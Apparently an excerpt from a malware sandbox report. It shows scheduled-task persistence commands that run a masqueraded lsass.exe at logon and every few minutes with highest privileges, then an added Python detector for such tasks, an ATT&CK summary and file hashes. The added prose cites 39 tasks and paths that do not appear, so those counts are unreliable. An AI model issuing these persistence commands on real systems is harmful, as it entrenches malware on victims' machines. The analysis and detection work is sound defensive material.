C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5036
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1084
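The 39 task creations above follow one pattern per payload: an ONLOGON task at /rl HIGHEST plus two MINUTE-interval tasks, and a file name borrowed from a Windows or Office binary placed where that binary does not live (lsass.exe under Program Files, winlogon.exe under Google\Temp, RuntimeBroker.exe under C:\Windows\Web). The triage below is an added example, not code from the report or from the sample: it parses schtasks /create command lines of this shape and flags the masquerade, the logon trigger at highest run level, and the short relaunch interval. The table of expected locations, the 15-minute threshold and the function names are assumptions of this example; three command lines are taken from the list above and two benign controls are constructed.

```python
"""Triage of schtasks /create command lines for persistence indicators.

Added example; not code from the sandbox report or from the sample.
"""
import re
from typing import Dict, List, Tuple

# Where these Windows executables legitimately live (assumption for this
# example; matched case-insensitively as a directory prefix).
EXPECTED_DIR: Dict[str, str] = {
    "lsass.exe": "C:\\Windows\\System32\\",
    "winlogon.exe": "C:\\Windows\\System32\\",
    "services.exe": "C:\\Windows\\System32\\",
    "conhost.exe": "C:\\Windows\\System32\\",
    "runtimebroker.exe": "C:\\Windows\\System32\\",
    "backgroundtaskhost.exe": "C:\\Windows\\System32\\",
    "unsecapp.exe": "C:\\Windows\\System32\\wbem\\",
    "searchapp.exe": "C:\\Windows\\SystemApps\\",
    "startmenuexperiencehost.exe": "C:\\Windows\\SystemApps\\",
}
WATCHDOG_MAX_MINUTES = 15  # assumption: /mo at or below this is treated as a relaunch loop

# Three command lines taken from the list above, plus two constructed controls
# that should produce no findings.
SAMPLE_CMDLINES: List[str] = [
    r'''schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\Web\RuntimeBroker.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\unsecapp.exe'" /f''',
    r'''schtasks.exe /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Program Files\Contoso\backup.exe --full" /ru SYSTEM /f''',
    r'''schtasks.exe /create /tn "ConsoleHost" /sc ONLOGON /tr "C:\Windows\System32\conhost.exe" /f''',
]

# A double-quoted run (which may contain spaces) or a bare word.
_TOKEN = re.compile(r'"[^"]*"|\S+')


def parse_schtasks(cmdline: str) -> Dict[str, str]:
    """Return the /option values of a schtasks command line, keyed in lower case.

    Double quotes are stripped from values, and so are the single quotes the
    sample wraps around the /tr path ("'C:\\...\\x.exe'").  Options without a
    value (/create, /f) map to "".
    """
    opts: Dict[str, str] = {}
    tokens = _TOKEN.findall(cmdline)
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[key] = tokens[i + 1].strip('"').strip("'")
                i += 2
                continue
            opts[key] = ""
        i += 1
    return opts


def executable_of(task_run: str) -> str:
    """Executable part of a /tr value; anything after the first '.exe' is treated as arguments."""
    idx = task_run.lower().find(".exe")
    return task_run if idx < 0 else task_run[: idx + 4]


def triage(cmdline: str) -> Tuple[str, List[str]]:
    """Return (task name, findings) for one schtasks command line."""
    opts = parse_schtasks(cmdline)
    name = opts.get("tn", "")
    findings: List[str] = []
    if "create" not in opts:
        return name, findings

    exe = executable_of(opts.get("tr", ""))
    base = exe.rsplit("\\", 1)[-1].lower()
    directory = exe[: len(exe) - len(base)]  # keeps the trailing backslash
    expected = EXPECTED_DIR.get(base)
    if expected and not directory.lower().startswith(expected.lower()):
        findings.append(f"masquerade: {base} scheduled from {directory}")

    schedule = opts.get("sc", "").upper()
    if schedule == "ONLOGON" and opts.get("rl", "").upper() == "HIGHEST":
        findings.append("logon trigger with /rl HIGHEST")

    if schedule == "MINUTE":
        try:
            every = int(opts.get("mo", "1"))
        except ValueError:
            every = 1
        if every <= WATCHDOG_MAX_MINUTES:
            findings.append(f"watchdog: relaunch every {every} min")
    return name, findings


def triage_all(cmdlines: List[str]) -> List[Tuple[str, List[str]]]:
    """Triage every line and keep only those with at least one finding."""
    results = [triage(line) for line in cmdlines]
    return [(name, f) for name, f in results if f]


if __name__ == "__main__":
    for name, findings in triage_all(SAMPLE_CMDLINES):
        print(name, "->", "; ".join(findings))
```

The same checks apply to tasks already on a host: the action path of each task returned by `Get-ScheduledTask` can be fed to `triage` by rebuilding a `/create` line, or `executable_of` and the `EXPECTED_DIR` lookup can be applied to the action directly.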
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
- System Services (1): Service Execution (1)
Persistence
- Create or Modify System Process (2): Windows Service (2)
- Power Settings (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Downloads
-
Filesize: 201B
MD5: a9feb4bb422aae9305d1c9d7c223dce5
SHA1: a4e983d8f1b7b21b9edc1fbbe358ea67dc38cf37
SHA256: 22851b07f5b85a7cd0992b1593b973b9e29af03733dd0a86284f0c759bbc2201
SHA512: da6a69df2fc09304c97979b51027971636328f01bd69dcab955395acf64e1f0c6c9a6aa9fe77d4d53f7fd16146acd332650f3d00cfd8664b6304ef719cbe4255
-
Filesize: 1.7MB
MD5: 19fc528bbada6d55a39b464c300a110e
SHA1: 4016abebf8f049737e2091dd743c15ff3fa96a73
SHA256: fd5275c55a974d4078eb7de59aa72ce412ac8bcb6c8249b213fea1e0df329d0f
SHA512: 41ae828bde4fe58fc970cf281b866f9bb4cf2ec1e2e835505ec65b041e134bd9adf9977fe85837a0921668c2cd8fe9fedd30b208c986b51e99c4864c33f02d03
-
Filesize: 1.7MB
MD5: 08278eef0c4511e2cbfce76266dd90f2
SHA1: 9dd9dee2b7b3b19a6e8271ee443b79bb64eb288b
SHA256: f9313b93b7c392002e914e4e6af21eb8f5e25f86c37803c64e84ae8d228f2f03
SHA512: 3e5fb401eafb8ddce42fd9bbbd23783941d7540e20edba98fe67e05871d72ac8c89e5a8a5254bc9db62cc74fae596b3c86785650e075e8a1d5b25651d90cadd0
-
Filesize: 32B
MD5: 39e72d40a9ddaaf86994f941af3f7465
SHA1: e4b7c6d895cb2ce60391ab1a4363425868b63204
SHA256: 4482b48de5d1a8c39b59f5293ddc7bbcba2af31ff77ebc02e48b68c6a68b0fae
SHA512: beb0761aaca17016bd7def46956b006f201885f24b1ecce29e75b65199f9196a3cb2461b79734e49f8a2328647f3ae2e741b8afb52d7857d429b0a7b0ef0f4a1
-
Filesize: 1.7MB
MD5: 140ab2669f87f619d65359606c22f762
SHA1: 021da66ad7962c4ac2ff0a05f0f424d1488a6efe
SHA256: 230b332f94351c501872b63e997a5f3a458e6f914835e85bfbf92ee7b1caad8b
SHA512: 4bd5602f850c4b33729a4789fa4540d601e76d9608da0fed16fa6b2573981ea87342f93f2c57aa145ecd63ccfe912c960eb245eb34833f3809892ac07c94857b
-
Filesize: 1.7MB
MD5: db580349ff4238ccf1b33aac144c28ed
SHA1: 2c97445c6c90307879e606da60a9bdcfac9d0a1f
SHA256: fd94d60527fc981979b222e23e368131e5e1d21cbb53fd71aa67684a308eb46f
SHA512: e8f1fe0dc62c7061ea2fd8f152a6347b882185a738e31883eb75fe140230b7f64bd9d51ed9af8df2850077c540579430b761f9b00f7645fc4364d9c09127b711
-
Filesize: 1.7MB
MD5: dbfa087e264beffa3a0247b3a5989aa5
SHA1: f1fc7b83a480cc49d17d7a91f92e2bef54ae4048
SHA256: 5d59ce562d799c6e0ce33d30ad5095c7432cd71ce66f4594377e28ae3a031533
SHA512: 198b3cab56b8c38d4bac0b4fcb7e995e7a4eaf64432a35f268a6d135ffe91d3dd2fcd3c1f0b7d38b993dc5aacc0c07d70c21a46d7dfcd4ecc1b96bcfba80dda2
-
Filesize: 1.7MB
MD5: e3c6c535f8752fd171107b16aeea7e17
SHA1: 32acd7d8666b85ae37f3d0e49a68bead46f5e81c
SHA256: a1ee8260f0ddb99fd706b31df2d201373b0e938c292eb8b02c56ada04d3d14fd
SHA512: 5516a4ae426ac4fa1654e83bf2255c7d94061aec51ca89c479796777d3633cf93536072e6c028afe1e9dc8e0aa6f447b3bee4d602835d2216b988e016e66e717
-
Filesize: 1KB
MD5: 3ad9a5252966a3ab5b1b3222424717be
SHA1: 5397522c86c74ddbfb2585b9613c794f4b4c3410
SHA256: 27525f5fc7871c6828ab5173315e95b5c7e918d2ee532781c562c378584b5249
SHA512: b1a745f7a0f33b777ffc34f74f42752144d9f2d06b8bc613e703570494762b3af87e153212c3274b18af14f17b8619e2f350b7c3cc11228f7d4208d4251e90e6
-
Filesize: 3KB
MD5: 223bd4ae02766ddc32e6145fd1a29301
SHA1: 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA256: 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512: 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
Filesize: 1KB
MD5: 5b9a7ee9a9286faef39bbe9cac042fd4
SHA1: cb3ef3c9e19781c45ffd9e2902e5b0ed38c0e2c3
SHA256: a6d5d07c333b6a68534ebc0ee23ea49e77a67f26597e4bd5bcc8dfd216e6a348
SHA512: ea14a4932134952864bd1b0ccdfd6ad45ed650a9bc52589f6d21fc4382a6237c6bbce1c016482b4a68cd609dadea234726927ba0f26e9443a6b970209281f450
-
Filesize: 944B
MD5: cadef9abd087803c630df65264a6c81c
SHA1: babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256: cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512: 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize: 944B
MD5: 2e907f77659a6601fcc408274894da2e
SHA1: 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256: 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512: 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
Filesize: 944B
MD5: bd5940f08d0be56e65e5f2aaf47c538e
SHA1: d7e31b87866e5e383ab5499da64aba50f03e8443
SHA256: 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512: c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406
-
Filesize: 944B
MD5: e8ce785f8ccc6d202d56fefc59764945
SHA1: ca032c62ddc5e0f26d84eff9895eb87f14e15960
SHA256: d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4
SHA512: 66460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f
-
Filesize: 944B
MD5: e243a38635ff9a06c87c2a61a2200656
SHA1: ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256: af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA512: 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4
-
Filesize: 1KB
MD5: e1d7973fb9071815b4241da5ec0dfb6a
SHA1: 41f06afbd0ac9f9a0b226a2dd6fa9495d83209b9
SHA256: b3953ac9f5752d996ec2545864d6ccf09ffe4b0f84f41a2cc52a95ad8103212b
SHA512: 66163114aba8867561ceac2124bc2060c351cb4a83c4f8d40bc6bfd8042881690ea8152e2b58ec55b4b6de17e1610642c90df602e1fb2658b4c3d0783f3a0900
-
Filesize: 944B
MD5: 4cb59d549e8c5d613ea4b7524088528a
SHA1: 5bdfb9bc4920177a9e5d4b9c93df65383353ab22
SHA256: a4ac74b80eadcb876402dc2842d706a249691176dd838a6100a8c26bfa87811a
SHA512: a9f5bde138142665e056b1e2f40c16cff0c9a6a6907f038c4685275df66ceea39d9fca9a1c72529b2287632e0669346efb06ff302b0199764cca45b23faa4b52
-
Filesize: 482B
MD5: 68a095c7021a6ccc4d3a17d93f9e86bd
SHA1: 0f6ea77ee95e3bba5a67a266d2f2e2a6df9bc3ce
SHA256: 4744ed0a3de93248e8a4c3ce9e8f133387a8ccf437c5b57bb18dd99723f1b4f5
SHA512: b33abc8b188040b6c89c3f2310a20d0980cf08bbf2c5a479a82af39cf52119525d3fbcba2ca7ea2193bff35655f2cfdf5211fa6cd79624912876ed918e186f28
-
Filesize: 706B
MD5: d5fd9d27d73330bf57ded1888870d647
SHA1: 8a97cd2488b3e6a3c630fd38de221f3a399d36b4
SHA256: 8b2b064865036539bbcc1f94caaa6f9eb94b81cc9589e06b55cd19ae8c4e00df
SHA512: dfaa890f12484ebc19e4956bf7d0eff449f42da756392095721307288c24b438655b81ee6cc5d7f9cccf5ed1958e9d59ba5c56bd490fb380b300be3516b1ef86
-
Filesize: 2.0MB
MD5: e235a410c3e0c9432f755940e7d5ac61
SHA1: b94f875771c83acbcdcd3c788dc8002eaf91438f
SHA256: a77e85defe720361ffa22bc96fe3c82366c3ef61dd931bdf0e0326aa984a33b3
SHA512: 6d3c3650441b48e37ca1352d9f38a66a6376741439db8efc9f765de5df7506400e5ea5174d28734e2876889f242bc9ab7e8e5013c18575b5ccb7493bd8e2b33f
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 4.0MB
MD5: e84cc0620cc96970d2e1a8d0017000a6
SHA1: 3e06e2f55642880f6b3738f462a60bc4d84f68ba
SHA256: 17df34146d3c1442f4b303e9536dd207424eb4d07d90a54f8b4cef20f40d43a8
SHA512: d902fa5eed92eafc6f11f2a5d3e49020948e6c152d5c34a09c6d42b47ec2319da4ee5f63f38dd658da3f846e9495ad93ae3f9cfa834d827a59e9bc3ce5bd10f0
-
Filesize: 3KB
MD5: 7a47afdf68d97d678987c9d60eab9086
SHA1: 1e03088721b6c7d0aab59e80f12238837793f051
SHA256: 860d78899a84ae7c858183ff0eab215ee0f36febfdfd766a2fb6d429895da669
SHA512: 9dc0cbcefc921689582ed163c767c7c0b681236d499cf962ade0415a2b0fcd7d501e682a0ea3c385f7d039d3de94bb0b40c001851b1dd4c0d05c7fb26b65881c